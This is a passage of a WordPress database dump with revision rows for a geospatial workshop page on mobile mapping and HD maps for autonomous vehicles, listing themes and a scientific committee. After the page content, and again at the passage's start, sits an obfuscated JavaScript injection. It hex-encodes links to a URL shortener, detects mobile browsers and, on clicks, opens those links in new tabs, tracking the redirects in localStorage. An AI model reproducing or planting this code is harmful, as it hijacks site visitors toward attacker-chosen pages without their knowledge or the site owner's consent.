_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','MMT and HD Maps - Mobile Mapping Technologies and HD Maps','','inherit','closed','closed','','2095-revision-v1','','','2022-10-07 19:56:34','2022-10-07 19:56:34','',2095,'https://gsw2023.com/?p=2564',0,'revision','',0),
(2565,1,'2022-10-07 19:57:37','2022-10-07 19:57:37','[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2553\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"0\"]\r\n<h5 style=\"text-align: justify; color: black;\">Autonomous driving vehicles, or self-driving cars, have made enormous progress in recent years. With advances in computing and sensor technologies, onboard systems can deal with a large amount of data and achieve real-time process continuously and accurately. These systems also handle several specialized functional schemes such as positioning, mapping, perception, motion planning and control. These key components are essential for the vehicle to achieve fully autonomous operation. In addition, HD maps provide detailed map information for navigating autonomous vehicles to ensure the navigation safety to protect human lives. The map itself serves as an additional “pseudo sensor” of the car and it signiﬁcantly enhances the performance and accuracy of perception and positioning algorithms, which are necessary for the vehicle to drive autonomously. In addition, HD maps and real time accurate positioning enable a number of services and applications, supporting the realization of smart cities.</h5>\r\n<h5 style=\"text-align: justify; color: black;\">This workshop will cover relevant topics and trends in mobile mapping and high definition maps for intelligent transportation and smart city applications, and also introduce the new tendencies of this new paradigm in geospatial science.</h5>\r\n[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"green\" border_width=\"10\"][dt_team number=\"3\" order=\"asc\" type=\"grid\" padding=\"5\" images_sizing=\"resize\" round_images=\"y\" column_width=\"100\" category=\"ws3\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"green\" border_width=\"10\"][bsf-info-box icon_size=\"32\"]\r\n<h5 style=\"text-align: left; color: green;\"><strong><u>Themes of event:</u></strong></h5>\r\n<ul>\r\n 	<li>\r\n<h6><strong>Static HD maps automated production and update</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Dynamic HD maps automated production and update</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Conventional and crowd sourcing mapping platforms for HD maps production </strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>3rd party certified low-cost multi-sensor mapping systems for ITS applications</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Autonomous vehicle navigation with HD point cloud maps</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Autonomous vehicle navigation with HD vector maps</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>HD maps applications</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Formats, standards and field practice guidelines </strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Georeferenced 3D spatial information processing for smart road applications</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Georeferenced 3D spatial information manipulation for connected vehicles</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Multi-sensor calibration</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Sensor cluster design and platform developments</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Multi-sensor fusion for seamless mapping and navigation applications</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Simultaneous localization and mapping with LiDAR or cameras</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Point cloud processing</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Deep learning for 3D spatial information processing</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Feature extraction from georeferenced images and point cloud</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Multi-sensor system assessment and quality validation</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>GNSS denied and challenging environments validation</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Novel application cases</strong></h6>\r\n</li>\r\n</ul>\r\n[/bsf-info-box][vc_separator color=\"green\" style=\"shadow\" border_width=\"10\"][bsf-info-box icon_size=\"32\"]<u style=\"text-align: left; color: green;\">Scientific Committee:</u>\r\n<h6><strong>Kai-Wei Chiang, National Cheng Kung University, Taiwan</strong></h6>\r\n<ul>\r\n 	<li>\r\n<h6><strong>Andrea Masiero, University of Florence, Italy</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Aboelmagd Noureldin, Queens University, Canada</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Cheng Wang, Xiamen University, China</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Antonio Vettore, University of Padova, Italy</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Ling Pei, Shanghai Jiao Tong University, China</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Allison Kealy, RMIT, Australia</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Mohamed Elhabiby, Micro Engineering Tech Inc. (METI), Canada</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Gunther Retscher, University of Vienna, Austria</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Jonathan Li, University of Waterloo, Canada</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Xiaoji Niu, Wuhan University, China</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Vassilis Gikas, NTUA, Greece</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Marco Piras, Polytechnic of Turin, Italy</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Paolo Dabove, Polytechnic of Turin, Italy</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>You Li, Wuhan University, China</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Chenglu Wen, Xiamen University, China</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Adel Mohamed Aly Elsayed Moussa, Calgary University, Canada</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Hsiu-Wen Chang Joly, PSL University, France</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Salil Goel, Uttar Pradesh, India</strong></h6>\r\n</li>\r\n</ul>\r\n[/bsf-info-box][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','MMT and HD Maps - Mobile Mapping Technologies and HD Maps','','inherit','closed','closed','','2095-revision-v1','','','2022-10-07 19:57:37','2022-10-07 19:57:37','',2095,'https://gsw2023.com/?p=2565',0,'revision','',0),
(2566,1,'2022-10-07 19:59:15','2022-10-07 19:59:15','[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2553\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"0\"]\r\n<h5 style=\"text-align: justify; color: black;\">Autonomous driving vehicles, or self-driving cars, have made enormous progress in recent years. With advances in computing and sensor technologies, onboard systems can deal with a large amount of data and achieve real-time process continuously and accurately. These systems also handle several specialized functional schemes such as positioning, mapping, perception, motion planning and control. These key components are essential for the vehicle to achieve fully autonomous operation. In addition, HD maps provide detailed map information for navigating autonomous vehicles to ensure the navigation safety to protect human lives. The map itself serves as an additional “pseudo sensor” of the car and it signiﬁcantly enhances the performance and accuracy of perception and positioning algorithms, which are necessary for the vehicle to drive autonomously. In addition, HD maps and real time accurate positioning enable a number of services and applications, supporting the realization of smart cities.</h5>\r\n<h5 style=\"text-align: justify; color: black;\">This workshop will cover relevant topics and trends in mobile mapping and high definition maps for intelligent transportation and smart city applications, and also introduce the new tendencies of this new paradigm in geospatial science.</h5>\r\n[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"green\" border_width=\"10\"][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"37\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"green\" border_width=\"10\"][bsf-info-box icon_size=\"32\"]\r\n<h5 style=\"text-align: left; color: green;\"><strong><u>Themes of event:</u></strong></h5>\r\n<ul>\r\n 	<li>\r\n<h6><strong>Static HD maps automated production and update</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Dynamic HD maps automated production and update</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Conventional and crowd sourcing mapping platforms for HD maps production </strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>3rd party certified low-cost multi-sensor mapping systems for ITS applications</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Autonomous vehicle navigation with HD point cloud maps</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Autonomous vehicle navigation with HD vector maps</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>HD maps applications</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Formats, standards and field practice guidelines </strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Georeferenced 3D spatial information processing for smart road applications</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Georeferenced 3D spatial information manipulation for connected vehicles</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Multi-sensor calibration</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Sensor cluster design and platform developments</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Multi-sensor fusion for seamless mapping and navigation applications</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Simultaneous localization and mapping with LiDAR or cameras</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Point cloud processing</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Deep learning for 3D spatial information 